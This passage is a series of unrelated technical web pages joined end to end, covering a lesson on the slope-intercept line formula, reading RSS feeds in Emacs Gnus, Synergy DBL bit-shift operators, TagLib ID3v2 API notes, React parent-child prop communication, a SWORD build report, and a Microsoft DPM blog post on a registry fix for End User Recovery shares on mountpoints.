4) After the new recovery point job completes, verify the share got re-created in Computer Management and no longer has the folder path that starts with the \\?\ prefix.
Figure-7
5) Test end user recovery on the client – it should now list previous versions for the files located under the shared mountpoint.
Figure-8
Now that the prefix was removed from the MountVol share on the DPM 2012 server, figure-8 confirms that previous versions are now working.
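Step 1 above can also be performed from an elevated command prompt on the DPM server. A sketch using the built-in reg tool, with the key path taken from the steps above (the post indicates only the key's existence matters, so no value is needed):

```bat
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Data Protection Manager\Configuration\DiscardUNCPrefix"
```

Running reg add with only a key path creates an empty key at that location.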
As of this writing, it is unclear if this fix will be back-ported for DPM 2010, however if it is I will update this post.
Mike
Great article. Fixed my problem that no previous version are shown, while there are previous version available in DPM server.
Here’s a collection of the top Microsoft Support solutions to the most common issues experienced
Thank you! This fix helped us solve issues with protected DFS namespace shares as well (DPM 2012) No previous versions where showing either!
|
https://blogs.technet.microsoft.com/dpm/2012/05/21/data-protection-manager-support-for-end-user-recovery-on-mountpoint-shares/
|
CC-MAIN-2017-26
|
refinedweb
| 724
| 59.33
|
Search - "types"
- The people who are developing the Hostbill billing platform: please stop. Quit your jobs, and go do something else because you fucking SUCK at your JOBS!
I've had it with your shitty API! You ever heard of scalar types beyond string? "1", "0", "false".. Learn to use TYPES even though it's PHP! THERE'S TYPE SUPPORT THERE NOW YOU FUCKING IMBECILES! Some are typed, some or not, you never know! Guess and win!
And don't get me started on the documentation, OR THE LACK OF! Having to contact customer support to figure out HOW IM SUPPOSED TO DISPATCH DATA TO THE API BECAUSE YOU CAN'T BE BOTHERED TO WRITE THE INTERFACES OR EXAMPLES! FUCK YOU
- There are 2 types of bosses:
Type 1: Who think you are avoiding work
Type 2: Who are not your bosses
- Had to do some website migrations from Drupal 7, which has EOL coming up this year, to Wordpress. I gave an estimate to customers that it will take around 25-50 hours to do this (per site). Simply because I had no idea. Took me 6-8 hours per site. The sites are so low traffic that I didn't even bother refactoring earlier code that much. Maybe tweak a few content types to make future maintenance easier.
Still gonna bill them for the minimum I gave them as an estimate. I still consider that number to be way lower than what some agencies would've billed any of 'em. I've seen the contracts some people have signed, paying for 120 hours of work, for a very simple content based site, where I could've done it in maybe 20 hours. So much air in those contracts, that I spend 10 minutes laughing at them.
- "Pay more attention to the house"
Oh, really?
I'm working here!
Why every non tech person acts like I'm doing no fucking shit all day?
These types of things makes me want to open my own fucking office.
- CAN 👏 PEOPLE 👏 STOP 👏 ADDING 👏 `/// <reference lib="dom">` 👏 TO 👏 NODE.JS 👏 PACKAGES
It's a Node.JS package, for fuck's sake. But for SOME reason, sometimes to get around the lack of `URL` and `URLSearchParams` in @types/node, people keep including the *entire* DOM typings in their definition files/TypeScript files!
Sometimes I upgrade my deps in a Node.JS project and find that DOM typings have been added, causing errors when trying to use the global `URL`/`URLSearchParams` (I've shimmed these so that these (Node.JS versions) are in the global namespace). Then you have to search in all your dependencies for which one is including the DOM definitions.
- Why the fuck do consultants / noob types LOVE using fucking props in react components. This app is complex, just make a fucking redux slice and use that. I'm not passing 23904 props to a component to get it to render. God
- There are two types of people who attempted to learn programming:
Those who are disappointed because they tried but failed to become a programmer
Those who became programmer for real but disappointed anyway
- My two main grudges against Typescript:
1) Union types can't be passed as arguments if there is a variant for every element of the union
2) No tuple polymorphism, i.e. [T, U] isn't assignable to [T]. This is not a mistake because the length of the arrays differs and therefore they may be interpreted in a different way, but IMO there should be a tuple type which is actually an array but length is unavailable and it supports polymorphism. This sounds stupid, but since function parameter lists work well with tuples it would actually enable a lot of functional tricks that are currently inaccessible.
- me: <checking diff of code, types "diff">
comp: error in command provide filenames
me: wtf...
me: oh, "git diff"
me: What's the diff?
Could a diff diff if a diff did not diff code? What?
- There are 10 types of people in this world: those who understand binary, and those who don't.
copied from
|
https://devrant.com/search?term=types
|
CC-MAIN-2022-27
|
refinedweb
| 719
| 72.97
|
Another way to do this, instead of passing the ref as an argument, is to call the subroutine on the ref. As code tricks go, this can get fairly dangerous fairly quickly, so any ref you would like to have this ability must first be anointed (blessed).
The responsibility now lays in the subroutine. The subroutine will need to be house-trained. If you start feeding it all sorts of garbage, your carpets will look all sorts of messy. That is, the subroutine should be expecting the data it is receiving - of which it is the recipient.
sub iexpectanarraycontainingdataaboutaccuracy{
my $arrayref = shift;
## todo: not ideal example
## also align 0/9 with degugging levels
print {STDOUT} $arrayref->[0], " is quite accurate\n";
print {STDOUT} $arrayref->[9], " is deeply inaccurate\n";
return 1;
}
Another consequence of invoking a subroutine on a blessed reference, is that the reference can only call subroutines that exist within the same package. At least in this case, as only the reference has been blessed in the one-argument form of bless. Suffice to say, this prevents the problem of that newly blessed reference being able to call random subroutines from other loaded packages.
But to stress again, it may call any routines in the same namespace, so you should also be aware to write the other subroutines to fail correctly should they be called erroneously.
#!perl
use 5.10.1;
use strict;
use warnings;
use Carp;
my @array_var = qw/Double, double toil and trouble;/;
say join "\n","\nfirst:", @array_var;
add_an_item( \ @array_var, $_ )
foreach qw/1234 abyzABYZ 4the5scottish6play 1when 2shall 3we 4three
+!/;
say join "\n","\nsecond: ",@array_var;
my $array_ref = \ @array_var;
bless $array_ref;
$array_ref->add_an_item( $_ )
foreach qw/1234 Fire burn, and cauldron bubble./;
say join "\n","\nthird: ", @array_var, "\nfourth: ", @$array_ref;
sub add_an_item{
say "\nsub args: ", join ' ', @_;
my $avref = shift;
my $item_to_add = shift;
# <STDIN> # use input module or this
$item_to_add =~ tr/a-zA-Z//cd;
unless ( $item_to_add ) {
carp( "Skipping item." ); # (reconstruction; the original carp message was truncated)
return;
}
push @$avref, $item_to_add; # (reconstruction; the elided tail presumably appended the item)
return 1;
}
reorg($_,\%combinations)
foreach(keys %combinations);
sub reorg{
my($k,$h) = @_;
foreach my $combiset(@{$h->{$k}}){
my @us =
grep { $_ =~ /\Aus/ } keys %combinations;
my $num = scalar(@us);
foreach my $set ( @$combiset ){
$combinations{'us'.++$num } = $set
unless grep @$set {<~~>} @$_,
@combinations{@us};
# where {<~~>} is 'these arrays match'
# or the front N indices do or ...
}
}
To end up with something like:
%combinations = (
    ...,
    us1 => [ qw(one two three four five) ],
    us2 => [ qw(one two three five seven) ],
    us3 => [ qw(one one two three five) ],
);
While writing this example, I felt as though most of writing code is iterator definition. Within this example, I require several uses of an iterator to define a growing number of keys; these themselves need to be used to clarify which keys the initial map operation continues to apply the reorganising routine to, while also not applying it to the new keys which have been added.
A kind of There's More Than One Way To Do What I Mean? I mean for the iterator to know the keys I started with, and only iterate through them as the hash grows. I mean for another iterator to build a set of unique values keyed in the original hash, built out of the original keys' values. I mean for the newly built unique values to be used straight away in validation checks on the remaining keys.
Here, I approach designing the code without considering what the internal behaviour of the iterator is, beyond the existing definition that it should not be relied upon. The internal iteration behaviour may change between versions, and the code is easily maintained through minor transitions.
What I need from the iterator is a defined behaviour. If the precise implementation has no impact (the code is not well designed if it relies on that), then would it not be reasonable to approach implementation as a matter of cost and efficiency? What is the fastest, most cost-effective implementation? Can that implementation reasonably be identified as being compatible for the next 15+ years? Can I access it and incant wizardry the way I might with symbol tables, such as by having a user-defined operator?
Perhaps something more robust, like a Global Iterator Variable / Symbol, along the lines of ${*} or *INC, *ARGV, or the match array $-[0..-1]. I don't want to be setting variables and flags in most cases. I want a simple concept of: don't rely on this behaviour, but this is how you can manipulate it if you want to. And considering the maintainer is a must: will the code self-document?
http://www.perlmonks.org/index.pl?node_id=847567
Recently, while working on a project, we needed a component in .NET that could encrypt/decrypt a user password using the Blowfish algorithm with an encryption key. We searched hard for a ready-made free .NET component to accomplish this task but found none! Finally, we found an implementation hint in an article posted on igniterealtime. We took the blowfish.java file from the Spark IM project and ported it to a .NET DLL using IKVM, a JVM for .NET. We then referenced the DLLs and used the encrypt and decrypt methods to do the required tasks.
using org.jivesoftware.util;
Blowfish algo = new Blowfish(encryptionKey);
string encryptedTxt = algo.encryptString("this is my test string");
string decryptedTxt = algo.decryptString(encryptedTxt);
https://www.codeproject.com/Tips/235342/Blowfish-Encryption-Implementation-in-NET?fid=1643581&df=90&mpp=10&sort=Position&spc=None&tid=4175949
Introduction to Functional Programming with Clojure
Most student programmers do not get introduced to functional programming beyond some extremely academic course using Standard ML that does not really showcase it as a practical programming style for real projects. It is rare that someone learns Haskell or OCaml or Lisp as their introduction to programming as opposed to something like C or Java, despite the fact that it is no more complicated and in my opinion a more intuitive way to think about computation in general. I hope to demonstrate that in reality, functional programming can be a great practical choice for almost any project and is absolutely worth the time it takes to learn and transition from more popular languages.
Why Clojure?
I am using Clojure to showcase these concepts because it was designed from the ground up to be practical above all else, and accomplishes that practicality by embracing functional programming. Furthermore, the language is very “opinionated,” in that all of its design decisions are core to the language, and writing in a non-idiomatic style is heavily discouraged throughout the design. You can look at Clojure’s official rationale for all of the details, but we will be exploring various aspects of it throughout this article.
Another benefit of Clojure is its Lisp syntax. Although totally alien to some, it is absolutely worth the effort to learn and get used to. Lisp is a family of languages originating in the 1960s that all have a similar prefix notation with heavy use of parentheses, as you will see. The beauty of Lisp is that its code is just a data structure that the language can interpret natively, also known as being homoiconic. This means that the fundamental syntax in Lisp is extremely bare-bones and can be expanded by libraries and code. It's a jarring transition, but with a good editor and some time, it becomes hard to go back. As usual, xkcd puts it best:
Basic Syntax and Functions
The goal of this section isn't to teach enough Clojure to actually use it (there are plenty of tutorials for that already), but to introduce enough to understand the core syntax and any examples that follow. This is by no means absolutely thorough, but it is surprisingly close to being complete, which is the beauty of Lisp. We will not touch at all on Java or the JVM, which is a very useful aspect of Clojure but not relevant to this discussion. It may seem like a lot of information, but if you keep in mind a comparison to other more popular languages, you will see that the syntax is practically tiny, and the standard library is a fraction of the size while being extremely expressive, if a bit difficult to grasp at first.
The first thing to understand before going any further is data in Clojure, much like in many other functional languages, is immutable. This means that you cannot write something like a for loop which must inherently mutate an index variable. Immutability means you no longer think of code as a series of instructions that change various values, and instead, think of code as a series of functions applied on functions, i.e. a series of transformations on data. These transformations can of course have side-effects, like printing to a terminal, because otherwise your program wouldn’t do anything, but functions with side-effects tend to be kept isolated where possible since it makes code much easier to understand and work with.
The fundamental action of any functional programming is, unsurprisingly, function application. In most programming languages, this is done with parenthesis following the function name, e.g.
add(1,3) might return 4. Alternatively, it is common to use infix notation for binary functions, e.g.
1+3 will return 4 or
2 == 3 will return false. Infix usually has implicit operator precedence, so
1+2*3 is 7 whereas
(1+2)*3 is 9. In Lisp, all of that is thrown away, and instead function application is done in the form of a list, also called an s-expression when used for function applications or nested data, where the first element is the function and the following elements are its arguments. So the previous examples are, in order:
(+ 1 3),
(= 2 3),
(+ 1 (* 2 3)), and
(* (+ 1 2) 3). In exchange for absolutely no ambiguity in function application (among other benefits we will see later), you get lots of parenthesis, with function definitions sometimes ending in 10 or more closing brackets, but that is easy enough to ignore.
Now that 70% of the syntax is out of the way, we can look at the rest. First of all comments use the semicolon symbol. The parenthesis structure represents a linked list. In order to prevent the list from being treated as function application, you can either add a quote, or use the
list function:
'(1 2 3) or
(list 1 2 3). Alternatively if a quote is too much syntax the function
quote can be used instead:
(quote (1 2 3)). The difference between these two may not be clear at first, but the key is that the quote form prevents an s-expression from being treated as code, whereas list is just a function that takes values as an argument. These are generally not used unless trying to write code to modify other code, i.e. create your own syntax using macros. We will look at some examples of standard library macros shortly.
Instead of using lists to store sequential data, it is more common to use vectors (which are akin to
ArrayLists in Java) as follows:
[1 2 3]. Some examples of basic operations you would expect from a sequential data structure:
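For example (these particular snippets are my own illustration of the kind of operations meant here), evaluated at a REPL:

```clojure
(def v [1 2 3])

(first v)          ;; => 1
(nth v 1)          ;; => 2
(count v)          ;; => 3
(conj v 4)         ;; => [1 2 3 4] ; conj adds to the end of a vector
(conj '(1 2 3) 4)  ;; => (4 1 2 3) ; but to the front of a list
```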
Note that in all cases commas to separate items are optional and normally excluded except in the case of long multi-line structures. The two other core data structures left in Clojure are the map (dictionary), and set. Maps are used to store key value pairs that can efficiently get a value given its key, and sets are a way to store a collection of values that are all unique. Both sets and maps can be stored in different ways internally, which can be controlled, but for our purposes we will not care about the difference between a hash set and sorted set (for example).
Clojure also includes all of the base data types you would expect, and a few more. There are strings, characters (denoted with a backslash
[\a \b \c] is a vector of 3 characters), integers, floats, and booleans. Conversions between types happen implicitly as Clojure heavily embraces polymorphism, so using a function like
first on a string returns a character. When converting to a boolean, every single value is considered truthy except for
nil and
false, including empty lists.
Clojure (and most Lisps) also support something called keywords, which are kind of like special strings used as keys in maps, denoted with a colon
:mykeyword. The reason they are used as keys in maps is because they are implicitly converted to a function for accessing that element in a map. For example,
(:a {:a "hi" :b "hello" :c "hey"}) would return
"hi", but that would not work if the keys were something other than keywords.
The penultimate data type I am going to mention is one that has appeared a number of times already, and it is the symbol. Every function name we have seen so far like
first is just a symbol referencing that function. These are effectively like pointers in C, or better yet they can be thought of as variable names. Like keywords, they are strings with special meaning attached to them, and can be converted to strings with the
str function, and the other way around with the
symbol function. By default, anytime you use a symbol, it will get replaced by the thing it references, which is why these functions actually do something. In order to prevent that and actually work with the symbols (which is something you rarely need to do), the quote macro is used just like with lists, e.g.
'first or
(quote first).
Finally and perhaps most importantly, there are functions. These are created using the
fn macro, which takes a vector of symbols, which are the function's inputs, and then an s-expression that uses those symbols to do something. Note that
fn itself is not a function per se, but a macro, meaning it takes all of its arguments as a data structure and operates on that code directly, which is why you can use variables inside the expression without them being directly evaluated. This happens at compile time, so all of these macros that are everywhere in Lisp will rearrange your code before the compiler sees it. This is a somewhat strange concept outside of Lisp, but it is how most more complex libraries are built up into programmer-friendly interfaces, and how complex concepts can be expressed in such a bare-bones syntax. It is like a much more powerful version of C preprocessor macros, made possible thanks to Lisp's homoiconicity. Conceptually this may be a bit confusing, but in practice it's extremely simple and looks the same as using any old function, so let's see some examples.
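For instance (my own minimal examples):

```clojure
;; an anonymous function applied immediately, just like a named one
((fn [x y] (+ x y)) 1 3)   ;; => 4

;; the named function + works in exactly the same position
(+ 1 3)                    ;; => 4

;; #(...) is reader shorthand for fn, with % as the argument
(#(* 2 %) 21)              ;; => 42
```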
Notice the consistency of the syntax here: it does not matter whether a function is named or not, putting it as the first element of an s-expression applies it regardless. That is what makes Lisp so great: it is fundamentally so simple (to paraphrase Clojure's creator Rich Hickey, "simple but not necessarily easy") that everything works exactly as you expect.
The last remaining thing to point out is that you can globally bind data (which includes functions) to a symbol using
def. There are also ways to locally bind symbols (namely let binding) but we won’t concern ourselves with that for now. The
defn macro combines
def and
fn into one form since defining functions is done so often.
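A minimal illustration (my own, with invented names):

```clojure
(def double-it (fn [x] (* 2 x)))  ;; bind an anonymous function to a symbol
(defn double-it2 [x] (* 2 x))     ;; defn: the same thing in one form

(double-it 5)    ;; => 10
(double-it2 5)   ;; => 10
```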
Functional Programming
The key difference in all of this syntax compared to more common languages is that there is no idiomatic way to do one action followed by another, since data is immutable (there are constructs in the language to do that, specifically for handling functions with side effects like
println ). Instead, programming should be thought of as a series of transformations of data. Let's say you want to double every element in an array. In a language like C, you would write a for loop that goes through each element of the array, multiplies it by 2, and then modifies the array with the result. If you then later use that array in some function, you must keep in your head as the programmer that at some time during the program's execution, that array's meaning and value changed. Furthermore, in the process, a new variable needed to be declared to keep track of the current iteration in the loop. Sure, it has no performance impact and can be easily optimized away, but it's extra code that does not have anything to do with the programmer's actual goal.
Clojure (and basically every functional language) has a function called
map that takes as input a function that takes 1 parameter, and a list. It then returns a list with that function applied to every element of the input list. Let’s see the Clojure version of the above code. Note that it is assumed that all of this code is put into the Clojure REPL (Read-Eval-Print Loop, much like the one python has, as well as terminals like Bash), since normally Clojure code is not just run sequentially like an imperative language would be.
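A sketch of the doubling transformation at the REPL (my own rendering of the example being described):

```clojure
;; double every element of a sequence without loops or mutation
(map (fn [x] (* 2 x)) [1 2 3 4])  ;; => (2 4 6 8)
```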
map is a much weaker operation than the for loop, which is exactly why it's so great. It inherently encodes the idea of taking an operation and using it identically on every element of a sequence, which is one of the most common uses of a loop anyway.
If you look back, you may notice that the operation of multiplying every element of an array by 2 could be made parallel easily, since no part of the computation depends on another. In fact, the
map function in general satisfies that same property. Therefore, Clojure has a function called
pmap, which is exactly like
map but runs in parallel (this includes some overhead for collating all of the results together, so it runs slower on small lists). The above code can be parallelized with exactly one character due to the nature of the transformation we wanted to perform! For loops on the other hand could potentially depend on former results because they are stateful, so any attempt at parallelization will likely be somewhat more complex.
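For illustration, the parallel version differs by a single character:

```clojure
;; identical to the map version, but the work runs in parallel
(pmap (fn [x] (* 2 x)) [1 2 3 4])  ;; => (2 4 6 8)
```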
Constraining the amount you can do with a single function or construct is core to what makes functional programming practical. Complicated algorithms get reduced down to something where each step is mostly self explanatory. It’s all about how the data gets manipulated, rather than manipulating the data. Of course every once in a while state may actually be the easiest way to solve a problem, and Clojure provides ways to handle that (e.g. atoms, which can be very helpful for complex concurrent programs) if you need it, it’s just that you usually don’t need it. In fact, just to keep you honest, every single standard library function that involves state in any way ends with a ‘!’ to help avoid bugs that so often come with using stateful functions.
Of course, if programming should be thought of as a series of transformations, then there should be a good way to do many transformations in a row that isn’t as ugly or painful to read as just repeated function application. To that end, I want to introduce a fun little set of macros included in the standard library called threading macros, of which there are a handful that are all fundamentally the same. We will just look at the simplest one, which is called thread last, and written as
->> . It doesn’t actually do anything special, or provide you with more power, but it does provide you with “new syntax” as it effectively rearranges your code before the compiler sees it, allowing you as the programmer to read and write code that best represents the actual intention behind the code without being trapped by the very specific structure a simple Lisp program might have.
->> takes as its first input some data, and then every other input is an s-expression. The macro will then rearrange the code (BEFORE the s-expressions get evaluated) such that the initial piece of data gets put as the last argument of the next s-expression, and the result of that gets put into the last argument of the next one, etc. It is best understood with an example:
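The two versions being compared might look like this (reconstructed from the description; the function names are my own):

```clojure
;; nested version: must be read inside-out, bottom to top
(defn total-tax [items]
  (apply + (map #(* 0.2 %) (map second items))))

;; thread-last version: reads top to bottom as a pipeline
(defn total-tax-> [items]
  (->> items
       (map second)      ;; keep just the cost of each item
       (map #(* 0.2 %))  ;; 20% tax on each cost
       (apply +)))       ;; sum the taxes
```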
Both of these functions are exactly identical: they take a list of lists, where each sub-list represents an item and its cost, and return the total tax (assuming a 20% tax rate) on all of the items. The code takes the second element of each list, thereby transforming a list of lists into a single list, then multiplies every number by 0.2, and then sums them (apply takes a function of multiple arguments, like +, and calls it with the elements of a single list argument). The big difference is that the bottom one is much more readable, and effectively represents the exact process going through my head as I was writing the algorithm, whereas the first version requires reading bottom to top, right to left, which is unnatural both to read and to write. Being able to make decisions about syntax like that is the power of Lisp macros.
Let’s look at a more complex example, using some functions that have yet to be introduced. Merge sort seems like a nice place to start, since it is an extremely common algorithm used everywhere that is especially efficient with linked lists, which are commonly used in Clojure. For those unfamiliar with merge sort, it is a sorting algorithm with O(nlogn) asymptotic time complexity that works by using a subroutine that takes two already sorted lists and merges them together into a single sorted list. The input list is split in half, and then each half is sorted by merge sort (recursively), and then those two sorted lists are merged again. When reading the example, make sure to pay attention to indentation more so than the parentheses, since it is much easier to read that way. The many levels of nesting in Lisp-style braces can mostly be ignored if the code is formatted sensibly, which most sane people will do.
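A sketch of the merge sort being described; the names mrg, mrgsort, X, Y, R and the destructured x/xrest, y/yrest come from the text, while the exact bodies are my reconstruction:

```clojure
(defn mrg
  "Merge the already-sorted lists X and Y, accumulating the result in R."
  [[x & xrest :as X] [y & yrest :as Y] R]
  (cond
    (empty? X) (concat R Y)              ;; one side exhausted: append the rest
    (empty? Y) (concat R X)
    (<= x y)   (mrg xrest Y (conj R x))  ;; pick off the smaller head
    :else      (mrg X yrest (conj R y))))

(defn mrgsort [coll]
  (if (<= (count coll) 1)
    (seq coll)  ;; length 0 or 1 is already sorted
    (let [[a b] (split-at (quot (count coll) 2) coll)]
      (mrg (mrgsort a) (mrgsort b) []))))
```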
This example includes plenty of functions from the standard library that have yet to be introduced, but should be simple to understand by their name alone. This example also introduces a feature common in functional programming called parameter destructuring, which allows you to express a data structure parameter in terms of its components. In this case, the function
mrg takes three lists as a parameter,
X
Y and
R but the first two lists are separated into the first element (
x and
y respectively) and a list of remaining elements (
xrest and
yrest ). This is just a shorthand that makes code much easier to read and understand, as well as putting an emphasis on the structure and processing of data as opposed to the algorithm itself!
The
mrg function assumes that
X and
Y are both sorted, so it works by separating out the first element of each and checking which one is smallest. It then recursively calls itself with the same inputs except the smallest element has been removed from the corresponding list and added onto the result list. It effectively is going through and picking off the smallest elements of each list and adding them into a result, and when one of the lists is empty it just puts the remaining list onto the result and returns that. Fundamentally a very simple algorithm, but implemented quite differently than you might using C++ where you would need to constantly keep track of where in each list you are, and modify a results variable constantly.
mrg avoids having state by having more parameters, thereby maintaining its purity as a function. This means you can really easily test the function just by popping open a REPL and running
mrg with whatever parameters and ‘state’ you want.
mrgsort then just splits its input list in half, then runs
mrg on each half after sorting those recursively, and will just return a length 0 or 1 list as is since they are already sorted.
Notice how Clojure uses functions like
split-at and
count that can operate on practically any collection in Clojure. They can be used on lists, strings, and maps polymorphically in a way that just makes sense and is simple, whereas in an object-oriented language you would see functions like
split be part of the string class, working only on strings or classes derived from strings. The simplicity of data structures in Clojure grants polymorphism for free. In fact, this merge sort function will work on any list, vector, or even set of numbers, noting that the set and vector will be turned into a list (although they can easily be returned back into a set or vector with the
into function). If the
<= function used in
mrg (which is only valid for numbers) is replaced with the
compare function, then our sort will work with any core Clojure data structure (including hash maps, which implicitly convert to a list of length-2 vectors) containing any comparable data type such as strings and vectors. All of that polymorphism comes basically for free because every data structure in Clojure is just built off of the basic few, so any function that applies to the core data structures will also apply to any of your own, without writing any boilerplate or even thinking about it very much.
To really appreciate how much nicer it is to write in a functional style ultimately requires actually trying it yourself. To that end, I highly recommend spending some time learning Clojure or some other functional language properly, and maybe even consider using it for your next project. It’s absolutely worth the learning curve and really provides a unique perspective on designing systems. Here are a few resources to get started if you wish to learn more. Furthermore, Rich Hickey, Clojure’s creator, gives plenty of great talks (and writes great articles) on the design of the language that are absolutely worth looking at.
https://medium.com/hackers-at-cambridge/introduction-to-functional-programming-with-clojure-af1ad582010d?source=---------0
I have seen many other posts about this but I just cannot seem to get it to work. I'm trying to use Unity's HandHeldCam script as my main camera. I have made the variables that I want to change in the HandHeldCam script public. What I want to do is make it so that when the player has under a certain health, the camera starts to sway slightly more. I am able to do all the rest myself but I just can't seem to get the m_SwaySpeed over to my other script.
namespace UnityStandardAssets.Cameras
{
public class HandHeldCam : LookatTarget
{
public float m_SwaySpeed = .5f;
public float m_BaseSwayAmount = .5f;
I need to access these variables from this script
public Camera Cam;
public float playerHealth;
void Start () {
playerHealth = 100;
Cam = GetComponent<Camera>();
}
Using things like public HandHeldCam Sway; doesn't seem to work. If anyone can help that would be amazing.
public HandHeldCam Sway;
Hi Lewis_Games, I went in and modified the HandHeldCam script to give myself public getters and setters for its private variables.
using System;
using UnityEngine;
namespace UnityStandardAssets.Cameras
{
public class HandHeldCam : LookatTarget
{
[SerializeField] private float m_SwaySpeed = .5f;
[SerializeField] private float m_BaseSwayAmount = .5f;
[SerializeField] private float m_TrackingSwayAmount = .5f;
[Range(-1, 1)] [SerializeField] private float m_TrackingBias = 0;
// ...
#region getters
public float getSwaySpeed() {
return this.m_SwaySpeed;
}
public float getBaseSwayAmount() {
return this.m_BaseSwayAmount;
}
public float getTrackingSwayAmount() {
return this.m_TrackingSwayAmount;
}
public float getTrackingBias() {
return this.m_TrackingBias;
}
#endregion
#region setters
public void setSwaySpeed(float value) {
this.m_SwaySpeed = value;
}
public void setBaseSwayAmount(float value) {
this.m_BaseSwayAmount = value;
}
public void setTrackingSwayAmount(float value) {
this.m_TrackingSwayAmount = value;
}
public void setTrackingBias(float value) {
if (value < -1f) {
value = -1f;
}
if (value > 1f) {
value = 1f;
}
this.m_TrackingBias = value;
}
#endregion
}
}
I then included a using statement at the top of the script that needed to access it.
using UnityEngine;
using System.Collections;
using UnityStandardAssets.Cameras;
// If this script is on the same GameObject as HandHeldCam
// [RequireComponent(typeof(HandHeldCam))]
public class HandHeldAccess : MonoBehaviour {
private HandHeldCam hhc;
void Awake() {
// If this script is on the same GameObject as HandHeldCam
// hhc = GetComponent<HandHeldCam> ();
hhc = Camera.main.GetComponent<HandHeldCam>();
}
void Start() {
Debug.Log("base sway before: " + hhc.getBaseSwayAmount());
Debug.Log ("sway speed before: " + hhc.getSwaySpeed());
Debug.Log ("tracking bias before: " + hhc.getTrackingBias());
Debug.Log ("tracking sway amount before: " + hhc.getTrackingSwayAmount());
hhc.setBaseSwayAmount (1.5f);
hhc.setSwaySpeed (2.75f);
hhc.setTrackingBias (3.825f);
hhc.setTrackingSwayAmount (5);
Debug.Log("base sway after: " + hhc.getBaseSwayAmount());
Debug.Log ("sway speed after: " + hhc.getSwaySpeed());
Debug.Log ("tracking bias after: " + hhc.getTrackingBias());
Debug.Log ("tracking sway amount after: " + hhc.getTrackingSwayAmount());
}
}
Doing that gets me this error: NullReferenceException: Object reference not set to an instance of an object HandHeldAccess.Awake () (at Assets/HandHeldAccess.cs:9). Not sure if it has to do with the camera being a child of the object with the health script, but I can't seem to get it to work. For some reason I remember an easier way of doing this.
Thanks for the help
Never mind, thanks for the help, I managed to fix it. I forgot to set the camera as the main cam.
Still feel like there is an easier way to do this by using GetComponentInChildren or something, but I can't remember.
Thanks for the help Lewis
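For reference, the GetComponentInChildren approach hinted at above might look like this (a sketch only; it assumes the modified HandHeldCam from the answer above sits on a camera that is a child of the player object, and the class and threshold names are my own):

```csharp
using UnityEngine;
using UnityStandardAssets.Cameras;

public class HealthSway : MonoBehaviour {
    public float playerHealth = 100f;
    private HandHeldCam hhc;

    void Awake() {
        // searches this GameObject and all of its children,
        // so it works when the camera is a child of the player
        hhc = GetComponentInChildren<HandHeldCam>();
    }

    void Update() {
        // sway more once health drops below a threshold
        hhc.setSwaySpeed(playerHealth < 50f ? 2f : 0.5f);
    }
}
```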
Answer by Lewis_Game
·
Apr 30, 2016 at 01:35 AM
I was able to find the best way to get the script from the other GameObject. Something that I completely forgot was to get the game object: public GameObject other; This made it so that the script could be found. This was my mistake, but thanks for the help anyway.
public GameObject other;
Answer by dandelo99
·
Apr 28, 2016 at 09:08 AM
Try Cam.GetComponent<HandHeldCam>().m_SwaySpeed; instead of this line: Cam = GetComponent<Camera>();
You can change the variable like this, for example:
if (something)
{
Cam.GetComponent<HandHeldCam>().m_SwaySpeed = 1.5f;
}
https://answers.unity.com/questions/1177818/how-can-i-access-variables-from-other-scripts-c.html
LCM [Least Common Multiple] Tutorial
Let's get started! 😉
Function
I recommend you put all this code I'm going to teach you in a function like this:
def LCM(n, m): # n and m are just any numbers
    # code here
First do that.
Logic time!
So...most of you should know how to find the LCM between 2 numbers. If you don't, I'll teach you.
Prime factorization
You need to do the prime factorization of the numbers you are going to do the LCM for (if you don't know how to do prime factorization, then too bad. XD). Remember to use the exponent way, like
2^3 * 3^2 (note that ^ means to the power of), don't write it out as
2*2*2*3*3.
After you did that, you need to find the greatest exponent for each base (in 2^3, 2 is the base and 3 is the exponent). Do this for each individual base. If you come to a situation where one number has, say, a 5^2 but the other number does not have that prime factor at all, then you just take that one as it is.
Finally, multiply all the ones you chose. That's it.
Here's a example to help you.
What is the LCM(12, 40)?
First, we need to do the prime factorization.
12 = 2^2 * 3^1 and
40 = 2^3 * 5^1.
12 = 2^2 * 3^1 40 = 2^3 * 5^1
We see that
2^3 is greater than
2^2, so we take 2^3. There is no other factor with base 3 except 3^1, and the same goes for 5^1, so those are taken directly.
2^3 * 3^1 * 5^1 = 120. That's the answer.
But that doesn't have anything to do with this tutorial!
🤣
This tutorial is much easier and simpler.
Getting started (finally)
Logic
We need to know which number is which, so we can keep adding one of the numbers to a running total until that total is divisible by the other number. We can do that by:
def LCM(n, m):
    global y # make it a global variable
    if n < m: # if n is less than m
        y = n
        while y < n*m: # y has to be less than the product of the numbers you want to find the LCM of
            y += n # keep adding n to the value of y
            if y % m == 0: # every loop, check if y divided by the other number (in this case m) leaves a remainder of 0, which means it divides evenly
                print(y) # if this event occurs, then print the LCM
                break # exit the loop
    # same thing but just opposite
    elif m < n:
        y = m # start from m here, otherwise the multiples of n would be skipped
        while y < n*m:
            y += m
            if y % n == 0:
                print(y)
                break
    else: # the numbers are equal, so the LCM is just the number itself
        print(n)
To use the program, simply do
LCM(4,5) # call the function with the parameters
You could also add things to the program like colors, etc.
Note that if the inputs are not valid numbers, the program will raise an error, so you might want to add some
try and
except to it.
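As an aside (not part of the tutorial's method), a shorter and safer way to compute the LCM uses the identity lcm(n, m) * gcd(n, m) == n * m:

```python
import math

def lcm(n, m):
    # LCM via the GCD identity: lcm(n, m) = n * m // gcd(n, m)
    return n * m // math.gcd(n, m)

print(lcm(12, 40))  # → 120
print(lcm(4, 5))    # → 20
```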
That's it everyone! Bai!🤗
https://replit.com/talk/learn/LCM-Least-Common-Multiple-Tutorial/127083
Assuming a Role
You must designate a separate IAM user to assume each role you've created in each account, and ensure that each IAM user has appropriate permissions.
IAM Users and Roles
After you have created the necessary roles and policies in Account A for scenarios 1 and 2, you must designate an IAM user in each of the accounts B, C, and Z. Each IAM user will programmatically assume the appropriate role to access the log files. That is, the user in account B will assume the role created for account B, the user in account C will assume the role created for account C, and the user in account Z will assume the role created for account Z. When a user assumes a role, AWS returns temporary security credentials that can be used to make requests to list, retrieve, copy, or delete the log files depending on the permissions granted by the access policy associated with the role.
For more information about working with IAM users, see Working with IAM Users and Groups .
The primary difference between scenarios 1 and 2 is in the access policy that you create for each IAM role in each scenario.
In scenario 1, the access policies for accounts B and C limit each account to reading only its own log files. For more information, see Creating an Access Policy to Grant Access to Accounts You Own.
In scenario 2, the access policy for Account Z allows it to read all the log files that are aggregated in the Amazon S3 bucket. For more information, see Creating an Access Policy to Grant Access to a Third Party .
Creating permissions policies for IAM users
